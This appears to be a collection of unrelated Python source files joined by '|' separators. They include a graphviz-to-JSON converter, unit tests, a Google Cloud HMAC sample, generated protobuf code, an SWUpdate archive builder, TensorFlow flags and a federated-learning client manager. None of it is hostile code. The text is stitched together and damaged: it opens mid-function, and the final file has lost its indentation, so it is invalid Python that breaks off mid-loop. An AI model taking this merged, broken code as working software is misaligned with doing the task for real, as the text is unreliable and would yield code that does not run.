    x = st.text_input("VIN", "")
    result = ""
    # the below line ensures that when the button called 'Validate' is
    # clicked, the Validate function defined above is called and its
    # result is displayed
    if st.button("Validate"):
        result = Validate(x)
        st.success('The output is {}'.format(result))

if __name__=='__main__':
    main()
# In[ ]:
|
#!/usr/bin/env python
"""
dot to json
===========
Convert from graphviz dot file to json in order to visualize a graph using d3.js
You must install pygraphviz and networkx, on Ubuntu:
sudo apt-get install python-pygraphviz python-networkx
Then use the following template replacing the resulting 'force.json'
https://github.com/networkx/networkx/tree/master/examples/javascript/force
"""
def dot_to_json(file_in, file_out, indent=1):
    """Convert a graphviz .dot file to a d3.js-friendly JSON file.

    file_in  -- path of the input .dot file
    file_out -- path of the JSON file to write
    indent   -- json.dump indentation level
    Returns 0 on success, 1 if the required packages are missing.
    """
    import json
    try:
        import networkx
        import pygraphviz
        from networkx.readwrite import json_graph
    except ImportError:
        print("Install pygraphviz and networkx:")
        print("sudo apt-get install python-pygraphviz python-networkx")
        return 1
    # NOTE(review): networkx.from_agraph moved to
    # networkx.nx_agraph.from_agraph in networkx >= 2.0 — confirm the
    # installed networkx version still exposes the top-level alias.
    graph_dot = pygraphviz.AGraph( file_in )
    graph_netx = networkx.from_agraph( graph_dot )
    graph_json = json_graph.node_link_data( graph_netx )
    # fix formatting [graphviz to d3.js]
    for node in graph_json["nodes"]:
        # replace label by name
        node['name'] = node.pop('label')
        # id from string to integer
        node['id'] = int(node['id'])
    with open(file_out, 'w') as f:
        json.dump(graph_json, f, indent=indent)
    return 0
def main(argv):
    """CLI entry point: dot_to_json(<file_in.dot>, <file_out.json>).

    Returns 0 on success, 1 on bad usage or missing dependencies.
    """
    if len(argv) < 3:
        print("usage: %s file_in.dot file_out.json"%argv[0])
        return 1
    return dot_to_json(argv[1], argv[2])
if __name__ == '__main__':
    # Exit with main's return code so shell callers can detect failure.
    import sys
    sys.exit(main(sys.argv))
|
#!/usr/bin/env python3
import unittest
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from demo import add, minus
class TestDemo(unittest.TestCase):
    """Test mathfuc.py"""

    @classmethod
    def setUpClass(cls):
        # Runs once before any test in this class.
        print ("this setupclass() method only called once.\n")

    @classmethod
    def tearDownClass(cls):
        # Runs once after every test in this class has finished.
        print ("this teardownclass() method only called once too.\n")

    def setUp(self):
        print ("do something before test : prepare environment.\n")

    def tearDown(self):
        print ("do something after test : clean up.\n")

    def test_add(self):
        """Test method add(a, b)"""
        self.assertEqual(3, add(1, 2))
        self.assertNotEqual(3, add(2, 2))

    def test_minus(self):
        """Test method minus(a, b)"""
        self.assertEqual(1, minus(3, 2))
        # BUG FIX: the original asserted assertNotEqual(1, minus(3, 2))
        # immediately after asserting equality on the same call, so the
        # test could never pass. Compare against a genuinely wrong value.
        self.assertNotEqual(2, minus(3, 2))

    @unittest.skip("don't run as not ready")
    def test_minus_with_skip(self):
        """Test method minus(a, b)"""
        self.assertEqual(1, minus(3, 2))
        # Same contradictory-assert fix as test_minus above.
        self.assertNotEqual(2, minus(3, 2))
if __name__ == '__main__':
    # verbosity: 0 = no per-case output; 1 = default dots; 2 = detailed
    # per-test results.
    unittest.main(verbosity=1)
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import pytest
from cryptography.hazmat.primitives import constant_time
class TestConstantTimeBytesEq(object):
    """Behavioural tests for constant_time.bytes_eq."""

    def test_reject_unicode(self):
        # bytes_eq accepts only bytes on both sides; any str argument
        # must raise TypeError.
        with pytest.raises(TypeError):
            constant_time.bytes_eq(b"foo", u"foo")
        with pytest.raises(TypeError):
            constant_time.bytes_eq(u"foo", b"foo")
        with pytest.raises(TypeError):
            constant_time.bytes_eq(u"foo", u"foo")

    def test_compares(self):
        # Equal, unequal, and different-length inputs.
        assert constant_time.bytes_eq(b"foo", b"foo") is True
        assert constant_time.bytes_eq(b"foo", b"bar") is False
        assert constant_time.bytes_eq(b"foobar", b"foo") is False
        assert constant_time.bytes_eq(b"foo", b"foobar") is False
|
#!/usr/bin/env python
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
# [START storage_get_hmac_key]
from google.cloud import storage
def get_key(access_id, project_id):
    """
    Retrieve the HMACKeyMetadata with the given access id.

    access_id  -- ID of an HMAC key
    project_id -- Your Google Cloud project ID
    Prints the key's metadata and returns the HMACKeyMetadata object.
    """
    storage_client = storage.Client(project=project_id)
    hmac_key = storage_client.get_hmac_key_metadata(
        access_id, project_id=project_id
    )
    print("The HMAC key metadata is:")
    print("Service Account Email: {}".format(hmac_key.service_account_email))
    print("Key ID: {}".format(hmac_key.id))
    print("Access ID: {}".format(hmac_key.access_id))
    print("Project ID: {}".format(hmac_key.project))
    print("State: {}".format(hmac_key.state))
    print("Created At: {}".format(hmac_key.time_created))
    print("Updated At: {}".format(hmac_key.updated))
    print("Etag: {}".format(hmac_key.etag))
    return hmac_key
# [END storage_get_hmac_key]
if __name__ == "__main__":
    # usage: python <script> <access_id> <project_id>
    get_key(access_id=sys.argv[1], project_id=sys.argv[2])
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: message.proto
# This module defines two messages: Command (with a nested CommandType
# enum) and MetaInfo. Regenerate from message.proto rather than editing.
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()

DESCRIPTOR = _descriptor.FileDescriptor(
  name='message.proto',
  package='',
  syntax='proto3',
  serialized_pb=_b('\n\rmessage.proto\"}\n\x07\x43ommand\x12\"\n\x04type\x18\x01 \x01(\x0e\x32\x14.Command.CommandType\x12\x0f\n\x07\x63hannel\x18\x02 \x01(\t\"=\n\x0b\x43ommandType\x12\x08\n\x04PLAY\x10\x00\x12\t\n\x05PAUSE\x10\x01\x12\x08\n\x04STOP\x10\x02\x12\x0f\n\x0bSET_CHANNEL\x10\x03\"8\n\x08MetaInfo\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07\x62itrate\x18\x02 \x01(\x05\x12\r\n\x05\x63odec\x18\x03 \x01(\tb\x06proto3')
)

# Enum descriptor for Command.CommandType (PLAY/PAUSE/STOP/SET_CHANNEL).
_COMMAND_COMMANDTYPE = _descriptor.EnumDescriptor(
  name='CommandType',
  full_name='Command.CommandType',
  filename=None,
  file=DESCRIPTOR,
  values=[
    _descriptor.EnumValueDescriptor(
      name='PLAY', index=0, number=0,
      options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='PAUSE', index=1, number=1,
      options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='STOP', index=2, number=2,
      options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='SET_CHANNEL', index=3, number=3,
      options=None,
      type=None),
  ],
  containing_type=None,
  options=None,
  serialized_start=81,
  serialized_end=142,
)
_sym_db.RegisterEnumDescriptor(_COMMAND_COMMANDTYPE)

# Message descriptor for Command: enum field `type` (1), string `channel` (2).
_COMMAND = _descriptor.Descriptor(
  name='Command',
  full_name='Command',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='type', full_name='Command.type', index=0,
      number=1, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='channel', full_name='Command.channel', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
    _COMMAND_COMMANDTYPE,
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=17,
  serialized_end=142,
)

# Message descriptor for MetaInfo: name (1), bitrate (2), codec (3).
_METAINFO = _descriptor.Descriptor(
  name='MetaInfo',
  full_name='MetaInfo',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='MetaInfo.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='bitrate', full_name='MetaInfo.bitrate', index=1,
      number=2, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='codec', full_name='MetaInfo.codec', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=144,
  serialized_end=200,
)

_COMMAND.fields_by_name['type'].enum_type = _COMMAND_COMMANDTYPE
_COMMAND_COMMANDTYPE.containing_type = _COMMAND
DESCRIPTOR.message_types_by_name['Command'] = _COMMAND
DESCRIPTOR.message_types_by_name['MetaInfo'] = _METAINFO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# Concrete message classes built by the reflection metaclass.
Command = _reflection.GeneratedProtocolMessageType('Command', (_message.Message,), dict(
  DESCRIPTOR = _COMMAND,
  __module__ = 'message_pb2'
  # @@protoc_insertion_point(class_scope:Command)
  ))
_sym_db.RegisterMessage(Command)

MetaInfo = _reflection.GeneratedProtocolMessageType('MetaInfo', (_message.Message,), dict(
  DESCRIPTOR = _METAINFO,
  __module__ = 'message_pb2'
  # @@protoc_insertion_point(class_scope:MetaInfo)
  ))
_sym_db.RegisterMessage(MetaInfo)

# @@protoc_insertion_point(module_scope)
|
#!/usr/bin/env python3
#
# Copyright (c) 2017-2020 Linutronix GmbH
#
# SPDX-License-Identifier: MIT
import libconf
import codecs
import logging
import os
import os.path
import shutil
import hashlib
from subprocess import Popen, PIPE
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from tempfile import TemporaryDirectory
import struct
def getuncompressedsize(filename):
    """Return the uncompressed size recorded in a gzip file's trailer.

    The last 4 bytes of a gzip stream hold ISIZE, the uncompressed
    size modulo 2**32, stored little-endian (RFC 1952).
    """
    with open(filename, 'rb') as f:
        f.seek(-4, 2)
        # '<I' pins little-endian as gzip mandates; the old bare 'I'
        # used host byte order and returned garbage on big-endian hosts.
        return struct.unpack('<I', f.read(4))[0]
def getsha256(filename):
    """Return the hex SHA-256 digest of the file's contents."""
    digest = hashlib.sha256()
    with open(filename, 'rb') as f:
        # Read in 1 KiB chunks until EOF so large files don't fill RAM.
        for chunk in iter(lambda: f.read(1024), b''):
            digest.update(chunk)
    return digest.hexdigest()
def find_and_link_file(entry, libdirs):
    """Locate entry.filename in libdirs and symlink it into the CWD.

    Returns the source path of the first directory containing the file;
    returns None (implicitly) when no libdir contains it.
    entry is assumed to be a libconf mapping with a `filename`
    attribute — confirm against the sw-description schema.
    """
    fname = entry.filename
    for d in libdirs:
        dname = os.path.join(d, fname)
        if os.path.exists(dname):
            try:
                os.symlink(dname, fname)
            except FileExistsError:
                # an earlier run already created the link; keep it
                pass
            return dname
def handle_image(i, opt):
    """Resolve, hash and annotate one sw-description image entry.

    Links the image into the build dir, records its sha256 and, for
    zlib-compressed volume images, stores the decompressed size as a
    property (needed by SWUpdate for UBI volumes).
    """
    if 'filename' not in i:
        return
    file_iv = find_and_link_file(i, opt.libdirs)
    sha256 = getsha256(i.filename)
    i['sha256'] = sha256
    if 'volume' in i and 'compressed' in i and (
            i.compressed is True or i.compressed == "zlib"):
        if 'encrypted' in i:
            # The gzip trailer of an encrypted blob is meaningless.
            logging.warning("""The decompressed-size cannot be calculated
                            for preencrypted volumes.""")
        else:
            unc_size = getuncompressedsize(file_iv)
            if 'properties' not in i:
                i['properties'] = {}
            i['properties']['decompressed-size'] = str(unc_size)
def handle_script(i, opt):
    """Resolve and hash one sw-description script/file entry.

    Links the referenced file into the build dir and records its sha256.
    """
    if 'filename' not in i:
        return
    find_and_link_file(i, opt.libdirs)
    sha256 = getsha256(i.filename)
    i['sha256'] = sha256
def find_key(key, d):
    """Recursively yield every element of the lists stored under `key`
    anywhere inside the nested mapping `d`.

    Non-mapping values are ignored, so leaves terminate the recursion.
    """
    if isinstance(d, dict):
        if key in d:
            # `yield from` replaces the manual per-element loops.
            yield from d[key]
        for v in d.values():
            yield from find_key(key, v)
def main():
    """Build (and optionally sign) an SWUpdate .swu archive.

    Reads a sw-description template, resolves every referenced image/
    script/file, annotates them with hashes and sizes, optionally signs
    the description, then packs everything into a crc-format cpio
    archive at --output.
    """
    parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter,
                            description='''Generate (signed) swu-update file,
                            based on information from a
                            template sw-description.''')
    parser.add_argument("template", metavar="TEMPLATE",
                        help="sw-description template (sw-decription.in)")
    parser.add_argument("--debug", action="store_true", dest="debug",
                        default=False,
                        help="Enable various features for debugging")
    parser.add_argument("-k", "--key", dest="key",
                        help="""pkcs11 uri or file name of the key used for
                        signing the update""")
    parser.add_argument("-o", "--output", dest="output",
                        default="firmware.swu",
                        help="filename of the resulting update file")
    parser.add_argument("-C", "--chdir", dest="chdir",
                        help="""directory where the sw-update cpio archive is
                        built""")
    parser.add_argument("-L", "--libdir", dest="libdirs", action="append",
                        default=['.'],
                        help="""add path where files (e.g. images and scripts)
                        are searched""")
    opt = parser.parse_args()
    # make all paths absolute
    swdescription_in = os.path.abspath(opt.template)
    if opt.key:
        keyfile = os.path.abspath(opt.key)
    opt.output = os.path.abspath(opt.output)
    opt.libdirs = [os.path.abspath(p) for p in opt.libdirs]
    if not opt.chdir:
        # keep the reference so the tempdir lives until the process exits
        temp = TemporaryDirectory()
        opt.chdir = temp.name
    os.chdir(opt.chdir)
    fp = codecs.open(swdescription_in, 'r', 'utf-8')
    cc = libconf.load(fp, filename=swdescription_in)
    # annotate every image/script/file entry with hashes and sizes
    for i in find_key('images', cc.software):
        handle_image(i, opt)
    for i in find_key('scripts', cc.software):
        handle_script(i, opt)
    for i in find_key('files', cc.software):
        handle_script(i, opt)
    fp = codecs.open('sw-description', 'w', 'utf-8')
    libconf.dump(cc, fp)
    fp.close()
    # sw-description must be the first member of the cpio archive
    files = ['sw-description']
    if opt.key:
        if os.path.isfile(keyfile):
            logging.warning("""Please consider providing a pkcs11 uri instead
                            of a key file.""")
            sign_cmd = 'openssl dgst -sha256 \
                        -sign "%s" sw-description \
                        > sw-description.sig' % keyfile
        else:
            sign_cmd = 'openssl dgst -sha256 \
                        -engine pkcs11 \
                        -keyform engine \
                        -sign "%s" sw-description \
                        > sw-description.sig' % opt.key
        # Preventing the malloc check works around Debian bug #923333
        if os.system('MALLOC_CHECK_=0 ' + sign_cmd) != 0:
            # NOTE(review): a signing failure is reported but not fatal —
            # confirm whether the build should abort here instead.
            print('failed to sign sw-description')
        files.append('sw-description.sig')
    for i in find_key('images', cc.software):
        if 'filename' in i:
            files.append(i.filename)
    for i in find_key('scripts', cc.software):
        if 'filename' in i:
            files.append(i.filename)
    for i in find_key('files', cc.software):
        if 'filename' in i:
            files.append(i.filename)
    swfp = open(opt.output, 'wb')
    # prefer paxcpio (handles >2GiB members); fall back to GNU cpio
    cpio_cmd = 'paxcpio'
    cpio_opt = '-L'
    if not shutil.which(cpio_cmd):
        cpio_cmd = 'cpio'
        cpio_opt = '--dereference'
    cpio = Popen([cpio_cmd, '-ov', '-H', 'crc', cpio_opt],
                 stdin=PIPE, stdout=swfp)
    # deduplicate while preserving order
    files_for_cpio = []
    for i in files:
        if i not in files_for_cpio:
            files_for_cpio.append(i)
    for n in files_for_cpio:
        if cpio_cmd == 'cpio' and os.path.getsize(n) > (2 << 30):
            logging.warning('''%s is greater than 2GiB. %s will have a bad
                            checksum with GNU cpio. Install paxcpio or
                            configure SWUpdate with DISABLE_CPIO_CRC.''',
                            n, opt.output)
        cpio.stdin.write(bytes(n+'\n', 'utf-8'))
    cpio.stdin.close()
    cpio.wait()
    swfp.close()
    print('finished')
if __name__ == "__main__":
    # Script entry point.
    main()
|
# -*- coding: utf-8 -*-
import os
import json
import subprocess
from wt.jinja import filters
# Path layout: this file lives in <root>/<workdir>; CSS sources live in
# <root>/src; the node helper script sits next to this module.
workdir = os.path.dirname(__file__)
rootdir = os.path.dirname(workdir)
srcdir = os.path.join(rootdir, 'src')
script = os.path.join(workdir, 'parse_css.js')
def parse_css(filename):
    """Run the node helper on a CSS source file and return the parsed
    JSON structure it prints on stdout.

    filename -- path relative to the project's src directory.
    Raises subprocess.CalledProcessError when node exits non-zero,
    which is clearer than the JSONDecodeError the old silent failure
    produced on empty stdout.
    """
    cmd = [
        'node',
        script,
        os.path.join(srcdir, filename)
    ]
    res = subprocess.run(cmd, capture_output=True, check=True)
    return json.loads(res.stdout)
def filename_to_id(filename):
    """Derive a DOM id from a CSS path: drop the 4-character extension
    and turn '/' and '_' into '-'."""
    stem = filename[:-4]
    return stem.replace('/', '-').replace('_', '-')
def css_content(filename):
    """Return the whitespace-stripped text content of a source CSS file."""
    path = os.path.join(srcdir, filename)
    with open(path, 'rt') as fobj:
        return fobj.read().strip()
# Register the helpers above as Jinja filters for the wt site generator.
filters.add(parse_css)
filters.add(filename_to_id)
filters.add(css_content)
|
from os import chdir, getcwd
# VERY IMPORTANT: Use the 'execute_at_target' function wrapper to
# take actions inside task directories; do not manually
# move the target directory!!
def execute_at_target(func, task):
    """Run func(task) with the CWD set to task.target_dir.

    The original directory is restored even when func raises; the old
    version leaked the chdir on any exception, leaving the process in
    the task directory.
    """
    original_dir = getcwd()
    chdir(task.target_dir)
    try:
        func(task)
    finally:
        chdir(original_dir)
|
# -*- coding: utf-8 -*-
__version__ = '2.0.0'
# Legacy default AppConfig hook; deprecated since Django 3.2 and
# removed in Django 4.1 — harmless but ignored on modern versions.
default_app_config = 'djangocms_snippet.apps.SnippetConfig'
|
from enhanced_subject_verb_object_extract import findSVOs, nlp
from nltk_subject_verb_object_extraction import SVO
from collections import OrderedDict
import pandas as pd
from pprint import pprint
def get_nsvos(extractor: SVO, text: str):
    """Run NLTK-based SVO extraction on each sentence of `text`.

    Returns one extraction result per sentence, in order.
    """
    sentences = extractor.sentence_split(text)
    return [
        extractor.process_parse_tree(next(extractor.get_parse_tree(s)))
        for s in sentences
    ]
def process_persuasion_data(data_file: str):
    """Load the persuasion CSV and group its rows into dialogs.

    Each turn carries both SVO extractions (enhanced spaCy-based and
    NLTK-based). Returns a list of {dialog_id, turns} dicts in
    first-seen order.

    Improvements over the original: the unused `header` local and the
    redundant `dialog_ids` list are gone, and the turn dict is built
    once instead of being duplicated in both branches.
    """
    dialogs = OrderedDict()
    data = pd.read_csv(data_file)
    nltksvo = SVO()
    for _, row in data.iterrows():
        turn = {
            "speaker": row["role"],
            "turn": row["turn"],
            "utterance": row["unit"],
            "esvo": findSVOs(nlp(row["unit"])),
            "nsvo": get_nsvos(nltksvo, row["unit"]),
        }
        dialog_id = row["dialog_id"]
        if dialog_id in dialogs:
            dialogs[dialog_id]["turns"].append(turn)
        else:
            dialogs[dialog_id] = {"dialog_id": dialog_id, "turns": [turn]}
    return list(dialogs.values())
if __name__ == '__main__':
    # json was never imported at module level, so the original crashed
    # with NameError before writing anything; import it here.
    import json
    dialogs = process_persuasion_data('data/Persuasion/full_dialog.csv')
    # `with` guarantees the file is closed; the f-string prefix on the
    # path was pointless (no placeholders) and has been dropped.
    with open("data/Persuasion/svo_dialogs.json", encoding="utf8", mode='w') as svo_datafile:
        svo_datafile.write(json.dumps(dialogs))
|
"""
Implements a Processor for dequantizing model parameters.
"""
import logging
from typing import Any
import torch
from plato.processors import model
class Processor(model.Processor):
    """
    Implements a Processor for dequantizing model parameters.
    """

    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)

    def process(self, data: Any) -> Any:
        """
        Dequantize the payload and log completion.

        The base class presumably applies _process_layer to every layer
        of `data` — confirm in plato.processors.model.
        """
        output = super().process(data)
        # NOTE(review): assumes this processor runs server-side, i.e.
        # the base class has set self.server_id — confirm.
        logging.info("[Server #%d] Dequantized features.", self.server_id)
        return output

    def _process_layer(self, layer: torch.Tensor) -> torch.Tensor:
        # torch.dequantize maps a quantized tensor back to float.
        layer = torch.dequantize(layer)
        return layer
|
class Utils:
    """Small collection of stateless helper functions."""

    @staticmethod
    def format_time(time):
        """Format a duration given in milliseconds as an HH:MM:SS string."""
        msec_per_sec = 1000
        seconds = (time / msec_per_sec) % 60
        minutes = (time / (msec_per_sec * 60)) % 60
        hours = (time / (msec_per_sec * 60 * 60)) % 24
        # %02d truncates each float component to a zero-padded integer.
        return "%02d:%02d:%02d" % (hours, minutes, seconds)
|
import tensorflow as tf
# Command-line flag definitions (TF1 tf.app.flags API).
# NOTE(review): many help strings below are copy-pasted ("the init of
# learn rate", "fast test", "name of experiment") and do not describe
# their flag — confirm intended meanings before trusting --help output.
flags = tf.app.flags
flags.DEFINE_integer("batch_size", 64, "batch size")
flags.DEFINE_integer("max_iters", 600000, "the maxmization epoch")
flags.DEFINE_integer("latent_dim", 128, "the dim of latent code")
flags.DEFINE_float("lr", 0.0003, "the init of learn rate")
#Please set this num of repeat by the size of your datasets.
flags.DEFINE_integer(
    "repeat", 10000, "the numbers of repeat for your datasets")
flags.DEFINE_string("path", 'oem',
    "for example, '/home/jack/data/' is the directory of your celebA data")
flags.DEFINE_integer("op", 0, "Training or Test")
flags.DEFINE_integer("seed", 1, "Training or Test")
flags.DEFINE_string(
    'hparams', '', 'Comma separated list of "name=value" pairs.')
flags.DEFINE_float('alpha', 10, 'lambda1')
flags.DEFINE_float('beta', 1, 'lambda2')
flags.DEFINE_integer('gamma', 0, 'recon or lossy recon')
flags.DEFINE_boolean('test', False, 'fast test')
flags.DEFINE_boolean('supervised', False, 'fast test')
flags.DEFINE_boolean('blur', False, 'fast test')
flags.DEFINE_integer('print_every', 200, 'print every')
flags.DEFINE_integer('save_every', 2000, 'print every')
flags.DEFINE_string('load', 'none', 'load best last')
flags.DEFINE_string('measurement_type', 'drop_patch', 'name of experiment')
flags.DEFINE_string('dataset', 'celebA', 'name of experiment')
flags.DEFINE_string('exp_name', '', 'name of experiment')
flags.DEFINE_string('exp_name_test', 'normal', 'name of experiment')
flags.DEFINE_string('unmeasure_type', 'blur', 'name of experiment')
flags.DEFINE_string('train_mode', 'ambient', 'name of experiment')
flags.DEFINE_float("lr_test", 0.1, "the init of learn rate")
flags.DEFINE_float("x_min", -1, "the init of learn rate")
flags.DEFINE_float("x_max", 1, "the init of learn rate")
flags.DEFINE_float("l2_w", 1e-6, "the init of learn rate")
flags.DEFINE_float("ml1_w", 5, "the init of learn rate")
flags.DEFINE_float("ml2_w", 0, "the init of learn rate")
flags.DEFINE_float("dl1_w", 0, "the init of learn rate")
flags.DEFINE_float("dl2_w", 0, "the init of learn rate")
flags.DEFINE_float("zp_w", 0.001, "the init of learn rate")
flags.DEFINE_float("drop_prob", 0.9, "the init of learn rate")
flags.DEFINE_float("blur_radius", 1, "the init of learn rate")
flags.DEFINE_float("additive_noise_std", 0.2, "the init of learn rate")
flags.DEFINE_float("signal_power", 0.2885201, "the init of learn rate")
flags.DEFINE_integer("iter_test", 100, "the init of learn rate")
flags.DEFINE_integer("num_angles", 1, "the init of learn rate")
flags.DEFINE_integer("patch_size", 32, "the init of learn rate")
flags.DEFINE_integer("blur_filter_size", 5, "the init of learn rate")
flags.DEFINE_integer("c_dim", 3, "the init of learn rate")
flags.DEFINE_list("image_dims", [64,64,3], "the init of learn rate")
# Parsed flag namespace used by the rest of the codebase.
FLAGS = flags.FLAGS
|
import copy
from cv2 import log
import numpy as np
import torch
from utils.Fed import FedAvg,FedAvgGradient, FedAvgP
from core.SGDClient_hr import SGDClient
from core.SVRGClient_hr import SVRGClient
from core.Client_hr import Client
from core.ClientManage import ClientManage
class ClientManageHR(ClientManage):
def __init__(self,args, net_glob, client_idx, dataset, dict_users, hyper_param) -> None:
    """Client manager for hyper-representation training.

    NOTE(review): the re-assignments below likely duplicate work done
    in ClientManage.__init__ (called just above) — confirm whether any
    besides the deepcopy of hyper_param are actually needed.
    """
    super().__init__(args, net_glob, client_idx, dataset, dict_users, hyper_param)
    self.client_idx=client_idx
    self.args=args
    self.dataset=dataset
    self.dict_users=dict_users
    self.hyper_param = copy.deepcopy(hyper_param)
def fed_in(self):
print(self.client_idx)
w_glob = self.net_glob.state_dict()
if self.args.all_clients:
print("Aggregation over all clients")
w_locals = [w_glob for i in range(self.args.num_users)]
else:
w_locals=[]
loss_locals = []
grad_locals = []
client_locals = []
temp_net=copy.deepcopy(self.net_glob)
for name, w in temp_net.named_parameters():
if not "header" in name:
w.requires_grad= False
for idx in self.client_idx:
if self.args.optim == 'sgd':
client = SGDClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
elif self.args.optim == 'svrg':
client = SVRGClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
grad = client.batch_grad()
grad_locals.append(grad)
else:
raise NotImplementedError
client_locals.append(client)
if self.args.optim == 'svrg':
avg_grad = FedAvgGradient(grad_locals)
for client in client_locals:
client.set_avg_q(avg_grad)
for client in client_locals:
w, loss = client.train_epoch()
if self.args.all_clients:
w_locals[idx] = copy.deepcopy(w)
else:
w_locals.append(copy.deepcopy(w))
loss_locals.append(copy.deepcopy(loss))
# update global weights
w_glob = FedAvg(w_locals)
# copy weight to net_glob
self.net_glob.load_state_dict(w_glob)
loss_avg = sum(loss_locals) / len(loss_locals)
return w_glob, loss_avg
def fedIHGP(self,client_locals):
d_out_d_y_locals=[]
for client in client_locals:
d_out_d_y,_=client.grad_d_out_d_y()
d_out_d_y_locals.append(d_out_d_y)
p=FedAvgP(d_out_d_y_locals,self.args)
p_locals=[]
if self.args.hvp_method == 'global_batch':
for i in range(self.args.neumann):
for client in client_locals:
p_client = client.hvp_iter(p, self.args.hlr)
p_locals.append(p_client)
p=FedAvgP(p_locals, self.args)
elif self.args.hvp_method == 'local_batch':
for client in client_locals:
p_client=p.clone()
for _ in range(self.args.neumann):
p_client = client.hvp_iter(p_client, self.args.hlr)
p_locals.append(p_client)
p=FedAvgP(p_locals, self.args)
else:
raise NotImplementedError
return p
def lfed_out(self,client_locals):
hg_locals =[]
for client in client_locals:
for _ in range(self.args.outer_tau):
client.hyper_iter=0
d_out_d_y,_=client.grad_d_out_d_y()
p_client=d_out_d_y.clone()
for _ in range(self.args.neumann):
p_client = client.hvp_iter(p_client, self.args.hlr)
hg_client = client.hyper_grad(p_client.clone())
hg = client.hyper_update(hg_client)
hg_locals.append(hg)
hg_glob=FedAvgP(hg_locals, self.args)
return hg_glob, 1
def lfed_out_svrg(self,client_locals):
hg_locals =[]
for client in client_locals:
client.hyper_iter=0
d_out_d_y,_=client.grad_d_out_d_y()
p_client=d_out_d_y.clone()
for _ in range(self.args.neumann):
p_client = client.hvp_iter(p_client, self.args.hlr)
hg_client = client.hyper_grad(p_client.clone())
hg_locals.append(hg_client)
hg_glob=FedAvgP(hg_locals, self.args)
hg_locals =[]
for client in client_locals:
for _ in range(self.args.outer_tau):
h = client.hyper_svrg_update(hg_glob)
hg_locals.append(h)
hg_glob=FedAvgP(hg_locals, self.args)
return hg_glob, 2
def fed_out(self):
client_locals=[]
for idx in self.client_idx:
client= Client(self.args, idx, copy.deepcopy(self.net_glob),self.dataset, self.dict_users, self.hyper_param)
client_locals.append(client)
if self.args.hvp_method == 'seperate':
return self.lfed_out(client_locals)
if self.args.hvp_method == 'seperate_svrg':
return self.lfed_out_svrg(client_locals)
p = self.fedIHGP(client_locals)
comm_round = 1+ self.args.neumann
hg_locals =[]
for client in client_locals:
hg= client.hyper_grad(p.clone())
hg_locals.append(hg)
hg_glob=FedAvgP(hg_locals, self.args)
print(hg_glob)
comm_round+=1
hg_locals =[]
for client in client_locals:
for _ in range(self.args.outer_tau):
h = client.hyper_svrg_update(hg_glob)
hg_locals.append(h)
hg_glob=FedAvgP(hg_locals, self.args)
comm_round+=1
return hg_glob, comm_round
def fed_joint(self):
print(self.client_idx)
w_glob = self.net_glob.state_dict()
if self.args.all_clients:
print("Aggregation over all clients")
w_locals = [w_glob for i in range(self.args.num_users)]
else:
w_locals=[]
loss_locals = []
grad_locals = []
client_locals = []
temp_net=copy.deepcopy(self.net_glob)
for idx in self.client_idx:
if self.args.optim == 'sgd':
client = SGDClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
elif self.args.optim == 'svrg':
client = SVRGClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
grad = client.batch_grad()
grad_locals.append(grad)
else:
raise NotImplementedError
client_locals.append(client)
if self.args.optim == 'svrg':
avg_grad = FedAvgGradient(grad_locals)
for client in client_locals:
